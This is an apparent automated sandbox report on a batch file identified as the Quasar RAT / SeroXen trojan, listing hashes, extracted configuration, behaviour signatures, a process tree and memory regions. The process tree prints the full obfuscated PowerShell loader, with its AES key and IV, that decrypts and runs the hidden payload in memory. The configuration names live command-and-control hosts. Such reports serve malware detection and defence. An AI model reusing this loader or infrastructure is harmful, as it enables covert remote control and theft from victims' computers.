Overview

overview

10

Static

static

1

test.bat

windows7-x64

7

test.bat

windows10-2004-x64

10

Analysis

  • max time kernel
    150s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250129-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250129-enlocale:en-usos:windows10-2004-x64system
  • submitted
    05-02-2025 00:40

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    test.bat

  • Size

    7.7MB

  • MD5

    22070488e8b05fa3d1555e35cb02e2c4

  • SHA1

    17affd9bceb5b254a65f2b918008118b3e771f5d

  • SHA256

    f9265a0554ffd7971bacbd4335ab32109aa2f8ba7f70dba315f4e1f48674b990

  • SHA512

    2db6d0ea121b100e0a2d69d93062f794ef52332139f67355a808cdf4310265575b17e62e3a6b2fe306a4ed8879a781bd203fc18cda7c074e0ded57c79528f0e6

  • SSDEEP

    49152:E1Knuw9suLZqlYvKn2jUftGqD68t0vgVuX3e/YI7G6YLgkHB6yNKvNBynnHeZhCN:P

Score
10/10
quasarseroxenv15.0 | fifa23spywaretrojan

Malware Config

Extracted

Family

quasar

Version

1.4.0

Botnet

v15.0 | Fifa23

C2

private123.duckdns.org:8808

dofucks.com:8808
Mutex

c398e98c-136e-4007-ab40-e179829f338c

Attributes
  • encryption_key

    C84CB6134701741C5122A14FACDB67C8CFA9C0AB

  • install_name

    .exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    $sxr-seroxen

Signatures

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

    trojanspywarequasar
  • Quasar family
    quasar
  • Quasar payload 1 IoCs
  • Seroxen family
    seroxen
  • Seroxen, Ser0xen

    Seroxen or SeroXen aka Ser0Xen is a trojan fist disovered in late 2022.

    trojanseroxen
  • Suspicious use of NtCreateUserProcessOtherParentProcess 3 IoCs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Deletes itself 1 IoCs
  • Executes dropped EXE 2 IoCs
  • Drops file in System32 directory 13 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Drops file in Windows directory 6 IoCs
  • Checks SCSI registry key(s) 3 TTPs 18 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 55 IoCs
  • Modifies registry class 4 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of UnmapMainImage 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:608
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
          PID:60
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{1e743430-22f1-45cb-9d46-422307980747}
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1708
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{6be5ab2b-407a-4c14-8f2d-af2f2c27fbf1}
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3496
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{ee9ac240-c8c9-4596-856d-68d3031a5ba4}
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:3304
      • C:\Windows\system32\lsass.exe
        C:\Windows\system32\lsass.exe
        1⤵
          PID:672
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
          1⤵
            PID:940
          • C:\Windows\system32\svchost.exe
            C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
            1⤵
              PID:388
            • C:\Windows\System32\svchost.exe
              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
              1⤵
                PID:912
              • C:\Windows\System32\svchost.exe
                C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                1⤵
                  PID:1036
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                  1⤵
                    PID:1072
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                    1⤵
                      PID:1152
                      • C:\Windows\system32\taskhostw.exe
                        taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
                        2⤵
                          PID:2440
                      • C:\Windows\System32\svchost.exe
                        C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                        1⤵
                          PID:1168
                        • C:\Windows\system32\svchost.exe
                          C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                          1⤵
                            PID:1280
                          • C:\Windows\system32\svchost.exe
                            C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                            1⤵
                              PID:1296
                            • C:\Windows\system32\svchost.exe
                              C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                              1⤵
                                PID:1372
                              • C:\Windows\system32\svchost.exe
                                C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                                1⤵
                                  PID:1404
                                • C:\Windows\system32\svchost.exe
                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                                  1⤵
                                    PID:1424
                                    • C:\Windows\system32\sihost.exe
                                      sihost.exe
                                      2⤵
                                        PID:3000
                                    • C:\Windows\System32\svchost.exe
                                      C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                                      1⤵
                                        PID:1580
                                      • C:\Windows\system32\svchost.exe
                                        C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                        1⤵
                                          PID:1620
                                        • C:\Windows\System32\svchost.exe
                                          C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                          1⤵
                                            PID:1628
                                          • C:\Windows\system32\svchost.exe
                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                            1⤵
                                              PID:1724
                                            • C:\Windows\System32\svchost.exe
                                              C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
                                              1⤵
                                                PID:1740
                                              • C:\Windows\System32\svchost.exe
                                                C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                                1⤵
                                                  PID:1776
                                                • C:\Windows\System32\svchost.exe
                                                  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                  1⤵
                                                    PID:1856
                                                  • C:\Windows\System32\svchost.exe
                                                    C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                    1⤵
                                                      PID:2012
                                                    • C:\Windows\system32\svchost.exe
                                                      C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
                                                      1⤵
                                                        PID:2020
                                                      • C:\Windows\system32\svchost.exe
                                                        C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                        1⤵
                                                          PID:2036
                                                        • C:\Windows\system32\svchost.exe
                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                          1⤵
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:1144
                                                        • C:\Windows\System32\svchost.exe
                                                          C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                          1⤵
                                                            PID:1596
                                                          • C:\Windows\System32\spoolsv.exe
                                                            C:\Windows\System32\spoolsv.exe
                                                            1⤵
                                                              PID:2080
                                                            • C:\Windows\System32\svchost.exe
                                                              C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                              1⤵
                                                                PID:2188
                                                              • C:\Windows\System32\svchost.exe
                                                                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                                1⤵
                                                                  PID:2340
                                                                • C:\Windows\system32\svchost.exe
                                                                  C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
                                                                  1⤵
                                                                  • Drops file in System32 directory
                                                                  • Modifies data under HKEY_USERS
                                                                  PID:2476
                                                                • C:\Windows\system32\svchost.exe
                                                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                                  1⤵
                                                                    PID:2484
                                                                  • C:\Windows\system32\svchost.exe
                                                                    C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                                    1⤵
                                                                      PID:2504
                                                                    • C:\Windows\system32\svchost.exe
                                                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                      1⤵
                                                                        PID:2560
                                                                      • C:\Windows\sysmon.exe
                                                                        C:\Windows\sysmon.exe
                                                                        1⤵
                                                                          PID:2592
                                                                        • C:\Windows\System32\svchost.exe
                                                                          C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                          1⤵
                                                                            PID:2632
                                                                          • C:\Windows\system32\svchost.exe
                                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                            1⤵
                                                                              PID:2676
                                                                            • C:\Windows\system32\svchost.exe
                                                                              C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                              1⤵
                                                                                PID:3020
                                                                              • C:\Windows\system32\wbem\unsecapp.exe
                                                                                C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                                1⤵
                                                                                  PID:1004
                                                                                • C:\Windows\system32\svchost.exe
                                                                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
                                                                                  1⤵
                                                                                    PID:3012
                                                                                  • C:\Windows\system32\svchost.exe
                                                                                    C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                                    1⤵
                                                                                      PID:3336
                                                                                    • C:\Windows\Explorer.EXE
                                                                                      C:\Windows\Explorer.EXE
                                                                                      1⤵
                                                                                      • Suspicious use of UnmapMainImage
                                                                                      PID:3428
                                                                                      • C:\Windows\system32\cmd.exe
                                                                                        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\test.bat"
                                                                                        2⤵
                                                                                        • Suspicious use of WriteProcessMemory
                                                                                        PID:2868
                                                                                        • C:\Users\Admin\AppData\Local\Temp\test.bat.exe
                                                                                          "test.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $FtZQH = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\test.bat').Split([Environment]::NewLine);foreach ($xmKPG in $FtZQH) { if ($xmKPG.StartsWith(':: ')) { $qlpXv = $xmKPG.Substring(3); break; }; };$CsYzi = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($qlpXv);$WnTOt = New-Object System.Security.Cryptography.AesManaged;$WnTOt.Mode = [System.Security.Cryptography.CipherMode]::CBC;$WnTOt.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$WnTOt.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jm/zWcdAP2yFOo9YRnp6fCODfVseEY1ik7aooNZ0HOA=');$WnTOt.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('xIA/Y6iPwDpv7eTUg6ksag==');$WPyEL = $WnTOt.CreateDecryptor();$CsYzi = $WPyEL.TransformFinalBlock($CsYzi, 0, $CsYzi.Length);$WPyEL.Dispose();$WnTOt.Dispose();$MPGtP = New-Object System.IO.MemoryStream(, $CsYzi);$wmJMu = New-Object System.IO.MemoryStream;$NbMhf = New-Object System.IO.Compression.GZipStream($MPGtP, [IO.Compression.CompressionMode]::Decompress);$NbMhf.CopyTo($wmJMu);$NbMhf.Dispose();$MPGtP.Dispose();$wmJMu.Dispose();$CsYzi = $wmJMu.ToArray();$pirKz = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($CsYzi);$URmKi = $pirKz.EntryPoint;$URmKi.Invoke($null, (, [string[]] ('')))
                                                                                          3⤵
                                                                                          • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                          • Deletes itself
                                                                                          • Executes dropped EXE
                                                                                          • Suspicious use of SetThreadContext
                                                                                          • Drops file in Windows directory
                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          • Suspicious use of WriteProcessMemory
                                                                                          PID:756
                                                                                          • C:\Windows\SYSTEM32\cmd.exe
                                                                                            "cmd.exe" /C cd C:\Windows\ & $sxr-seroxen.bat
                                                                                            4⤵
                                                                                            • Drops file in Windows directory
                                                                                            • Suspicious use of WriteProcessMemory
                                                                                            PID:3480
                                                                                            • C:\Windows\System32\Conhost.exe
                                                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                              5⤵
                                                                                                PID:2572
                                                                                              • C:\Windows\$sxr-seroxen.bat.exe
                                                                                                "$sxr-seroxen.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $FtZQH = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Windows\$sxr-seroxen.bat').Split([Environment]::NewLine);foreach ($xmKPG in $FtZQH) { if ($xmKPG.StartsWith(':: ')) { $qlpXv = $xmKPG.Substring(3); break; }; };$CsYzi = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($qlpXv);$WnTOt = New-Object System.Security.Cryptography.AesManaged;$WnTOt.Mode = [System.Security.Cryptography.CipherMode]::CBC;$WnTOt.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$WnTOt.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jm/zWcdAP2yFOo9YRnp6fCODfVseEY1ik7aooNZ0HOA=');$WnTOt.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('xIA/Y6iPwDpv7eTUg6ksag==');$WPyEL = $WnTOt.CreateDecryptor();$CsYzi = $WPyEL.TransformFinalBlock($CsYzi, 0, $CsYzi.Length);$WPyEL.Dispose();$WnTOt.Dispose();$MPGtP = New-Object System.IO.MemoryStream(, $CsYzi);$wmJMu = New-Object System.IO.MemoryStream;$NbMhf = New-Object System.IO.Compression.GZipStream($MPGtP, [IO.Compression.CompressionMode]::Decompress);$NbMhf.CopyTo($wmJMu);$NbMhf.Dispose();$MPGtP.Dispose();$wmJMu.Dispose();$CsYzi = $wmJMu.ToArray();$pirKz = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($CsYzi);$URmKi = $pirKz.EntryPoint;$URmKi.Invoke($null, (, [string[]] ('')))
                                                                                                5⤵
                                                                                                • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                • Checks computer location settings
                                                                                                • Executes dropped EXE
                                                                                                • Drops file in System32 directory
                                                                                                • Suspicious use of SetThreadContext
                                                                                                • Drops file in Windows directory
                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                PID:3624
                                                                                                • C:\Windows\system32\wermgr.exe
                                                                                                  "C:\Windows\system32\wermgr.exe" "-outproc" "0" "3624" "2672" "2560" "2676" "0" "0" "2680" "0" "0" "0" "0" "0"
                                                                                                  6⤵
                                                                                                  • Checks processor information in registry
                                                                                                  • Enumerates system info in registry
                                                                                                  PID:2832
                                                                                      • C:\Windows\system32\svchost.exe
                                                                                        C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                                                        1⤵
                                                                                          PID:3532
                                                                                        • C:\Windows\system32\DllHost.exe
                                                                                          C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                          1⤵
                                                                                            PID:3724
                                                                                          • C:\Windows\System32\RuntimeBroker.exe
                                                                                            C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                            1⤵
                                                                                            • Modifies registry class
                                                                                            • Suspicious use of UnmapMainImage
                                                                                            PID:3880
                                                                                          • C:\Windows\System32\RuntimeBroker.exe
                                                                                            C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                            1⤵
                                                                                              PID:4132
                                                                                            • C:\Windows\system32\svchost.exe
                                                                                              C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                              1⤵
                                                                                                PID:4852
                                                                                              • C:\Windows\System32\svchost.exe
                                                                                                C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                                1⤵
                                                                                                  PID:4844
                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                  C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
                                                                                                  1⤵
                                                                                                    PID:2376
                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                    C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
                                                                                                    1⤵
                                                                                                    • Modifies data under HKEY_USERS
                                                                                                    PID:2556
                                                                                                  • C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
                                                                                                    "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
                                                                                                    1⤵
                                                                                                    • Drops file in System32 directory
                                                                                                    • Modifies data under HKEY_USERS
                                                                                                    PID:3524
                                                                                                  • C:\Windows\system32\SppExtComObj.exe
                                                                                                    C:\Windows\system32\SppExtComObj.exe -Embedding
                                                                                                    1⤵
                                                                                                      PID:4028
                                                                                                    • C:\Windows\System32\svchost.exe
                                                                                                      C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                                                      1⤵
                                                                                                        PID:2392
                                                                                                      • C:\Windows\system32\DllHost.exe
                                                                                                        C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                        1⤵
                                                                                                          PID:1924
                                                                                                        • C:\Windows\system32\svchost.exe
                                                                                                          C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
                                                                                                          1⤵
                                                                                                            PID:3108
                                                                                                          • C:\Windows\System32\RuntimeBroker.exe
                                                                                                            C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                            1⤵
                                                                                                              PID:4312
                                                                                                            • C:\Windows\System32\RuntimeBroker.exe
                                                                                                              C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                              1⤵
                                                                                                                PID:4636
                                                                                                              • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                1⤵
                                                                                                                  PID:3068
                                                                                                                • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                                  C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                  1⤵
                                                                                                                  • Checks BIOS information in registry
                                                                                                                  • Checks SCSI registry key(s)
                                                                                                                  • Enumerates system info in registry
                                                                                                                  PID:1452
                                                                                                                • C:\Windows\System32\svchost.exe
                                                                                                                  C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                                                                  1⤵
                                                                                                                    PID:1636

                                                                                                                  Network

                                                                                                                  MITRE ATT&CK Enterprise v15

                                                                                                                  Replay Monitor

                                                                                                                  Loading Replay Monitor...

                                                                                                                  Downloads

                                                                                                                  • C:\ProgramData\Microsoft\Windows\WER\Temp\WERF5E9.tmp.csv
                                                                                                                    Filesize

                                                                                                                    37KB

                                                                                                                    MD5

                                                                                                                    c86ecec26c8f2d660d9e6abc8b682a76

                                                                                                                    SHA1

                                                                                                                    25bdee4b58e2c6d0c6c6a1e2678971f68c4752cf

                                                                                                                    SHA256

                                                                                                                    2b08d2821db4eeb806804cb1a910e550d5e7ba750efc3a9a13daf02c7fb7954c

                                                                                                                    SHA512

                                                                                                                    edc85ee9f01273ff06beb2d0463624f52d95cb0bd1e3eaf9c42016da8a40fef632fb3fccc9527ccaf07dc73d731bcabd8c91e0143ac7c73ae024eb0eb029730c

                                                                                                                    Download Submit

                                                                                                                  • C:\ProgramData\Microsoft\Windows\WER\Temp\WERF648.tmp.txt
                                                                                                                    Filesize

                                                                                                                    13KB

                                                                                                                    MD5

                                                                                                                    211ce4f16725a462045cba99e27682ce

                                                                                                                    SHA1

                                                                                                                    7a19ed0c6e37985a05b163d16ce4214215f6fc2c

                                                                                                                    SHA256

                                                                                                                    5bcdf817892f1b1182f727bdf3d21ba62991ff0b1668ee7a3207d44a73260b73

                                                                                                                    SHA512

                                                                                                                    d44188d4ef784c7969f2ee108cff34e5222ce0f9ad935906f1813cf75431ec02dea9cb115686fb5522f8705d3c028fda37b7558c37e708badabc654f019804df

                                                                                                                    Download Submit

                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                                    Filesize

                                                                                                                    1KB

                                                                                                                    MD5

                                                                                                                    773440cd6eb4e778c7d2115d1f231f75

                                                                                                                    SHA1

                                                                                                                    4b600aa41fcd267817961c95b104a0717c40e558

                                                                                                                    SHA256

                                                                                                                    64c178f2a2edc319c244fa885951e0425ad172e0c9c18d9773069fa13a44385c

                                                                                                                    SHA512

                                                                                                                    af0370eb22d7153b7b71a033f56bc08796a0be9a1aa0f479585e03e099a215114f6ac059cf588999f3be36d91bc38ec64b0695071292db8e324ee7bcd505ee35

                                                                                                                    Download Submit

                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1cq3qxui.uvy.ps1
                                                                                                                    Filesize

                                                                                                                    60B

                                                                                                                    MD5

                                                                                                                    d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                    SHA1

                                                                                                                    6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                    SHA256

                                                                                                                    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                    SHA512

                                                                                                                    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                                    Download Submit

                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\test.bat.exe
                                                                                                                    Filesize

                                                                                                                    442KB

                                                                                                                    MD5

                                                                                                                    04029e121a0cfa5991749937dd22a1d9

                                                                                                                    SHA1

                                                                                                                    f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

                                                                                                                    SHA256

                                                                                                                    9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

                                                                                                                    SHA512

                                                                                                                    6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

                                                                                                                    Download Submit

                                                                                                                  • C:\Windows\$sxr-seroxen.bat
                                                                                                                    Filesize

                                                                                                                    7.7MB

                                                                                                                    MD5

                                                                                                                    22070488e8b05fa3d1555e35cb02e2c4

                                                                                                                    SHA1

                                                                                                                    17affd9bceb5b254a65f2b918008118b3e771f5d

                                                                                                                    SHA256

                                                                                                                    f9265a0554ffd7971bacbd4335ab32109aa2f8ba7f70dba315f4e1f48674b990

                                                                                                                    SHA512

                                                                                                                    2db6d0ea121b100e0a2d69d93062f794ef52332139f67355a808cdf4310265575b17e62e3a6b2fe306a4ed8879a781bd203fc18cda7c074e0ded57c79528f0e6

                                                                                                                    Download Submit

                                                                                                                  • memory/60-86-0x00007FF9EAE50000-0x00007FF9EAE60000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    64KB

                                                                                                                    Download

                                                                                                                  • memory/60-85-0x000002613B370000-0x000002613B514000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    1.6MB

                                                                                                                    Download

                                                                                                                  • memory/388-92-0x000002B16FB40000-0x000002B16FCE4000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    1.6MB

                                                                                                                    Download

                                                                                                                  • memory/388-93-0x00007FF9EAE50000-0x00007FF9EAE60000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    64KB

                                                                                                                    Download

                                                                                                                  • memory/608-78-0x0000024732620000-0x000002473274F000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    1.2MB

                                                                                                                    Download

                                                                                                                  • memory/608-76-0x00000247341E0000-0x0000024734384000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    1.6MB

                                                                                                                    Download

                                                                                                                  • memory/608-77-0x00007FF9EAE50000-0x00007FF9EAE60000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    64KB

                                                                                                                    Download

                                                                                                                  • memory/672-83-0x00007FF9EAE50000-0x00007FF9EAE60000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    64KB

                                                                                                                    Download

                                                                                                                  • memory/672-82-0x00000199CD400000-0x00000199CD5A4000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    1.6MB

                                                                                                                    Download

                                                                                                                  • memory/756-22-0x00007FFA29950000-0x00007FFA29A0E000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    760KB

                                                                                                                    Download

                                                                                                                  • memory/756-20-0x000002B0F9250000-0x000002B0F9376000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    1.1MB

                                                                                                                    Download

                                                                                                                  • memory/756-21-0x00007FFA2ADD0000-0x00007FFA2AFC5000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    2.0MB

                                                                                                                    Download

                                                                                                                  • memory/756-16-0x00007FFA0CB80000-0x00007FFA0D641000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    10.8MB

                                                                                                                    Download

                                                                                                                  • memory/756-15-0x00007FFA0CB80000-0x00007FFA0D641000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    10.8MB

                                                                                                                    Download

                                                                                                                  • memory/756-10-0x000002B0EFF20000-0x000002B0EFF42000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    136KB

                                                                                                                    Download

                                                                                                                  • memory/756-4-0x00007FFA0CB83000-0x00007FFA0CB85000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    8KB

                                                                                                                    Download

                                                                                                                  • memory/756-17-0x000002B0F01E0000-0x000002B0F07B0000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    5.8MB

                                                                                                                    Download

                                                                                                                  • memory/756-19-0x000002B0F8880000-0x000002B0F9248000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    9.8MB

                                                                                                                    Download

                                                                                                                  • memory/756-54-0x00007FFA0CB80000-0x00007FFA0D641000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    10.8MB

                                                                                                                    Download

                                                                                                                  • memory/912-100-0x000001EB3BF30000-0x000001EB3C0D4000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    1.6MB

                                                                                                                    Download

                                                                                                                  • memory/912-101-0x00007FF9EAE50000-0x00007FF9EAE60000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    64KB

                                                                                                                    Download

                                                                                                                  • memory/940-88-0x00000194E5110000-0x00000194E52B4000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    1.6MB

                                                                                                                    Download

                                                                                                                  • memory/940-89-0x00007FF9EAE50000-0x00007FF9EAE60000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    64KB

                                                                                                                    Download

                                                                                                                  • memory/1036-104-0x00007FF9EAE50000-0x00007FF9EAE60000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    64KB

                                                                                                                    Download

                                                                                                                  • memory/1036-103-0x00000266BAA70000-0x00000266BAC14000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    1.6MB

                                                                                                                    Download

                                                                                                                  • memory/1072-107-0x00007FF9EAE50000-0x00007FF9EAE60000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    64KB

                                                                                                                    Download

                                                                                                                  • memory/1072-106-0x000001D604470000-0x000001D604614000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    1.6MB

                                                                                                                    Download

                                                                                                                  • memory/1152-110-0x00007FF9EAE50000-0x00007FF9EAE60000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    64KB

                                                                                                                    Download

                                                                                                                  • memory/1152-109-0x0000020BB9C70000-0x0000020BB9E14000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    1.6MB

                                                                                                                    Download

                                                                                                                  • memory/1168-113-0x00007FF9EAE50000-0x00007FF9EAE60000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    64KB

                                                                                                                    Download

                                                                                                                  • memory/1168-112-0x0000024F4E200000-0x0000024F4E3A4000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    1.6MB

                                                                                                                    Download

                                                                                                                  • memory/1280-119-0x00007FF9EAE50000-0x00007FF9EAE60000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    64KB

                                                                                                                    Download

                                                                                                                  • memory/1280-118-0x000001FE6E1B0000-0x000001FE6E354000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    1.6MB

                                                                                                                    Download

                                                                                                                  • memory/1296-121-0x0000024AB5F30000-0x0000024AB60D4000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    1.6MB

                                                                                                                    Download

                                                                                                                  • memory/1708-31-0x0000000140000000-0x000000014018B000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    1.5MB

                                                                                                                    Download

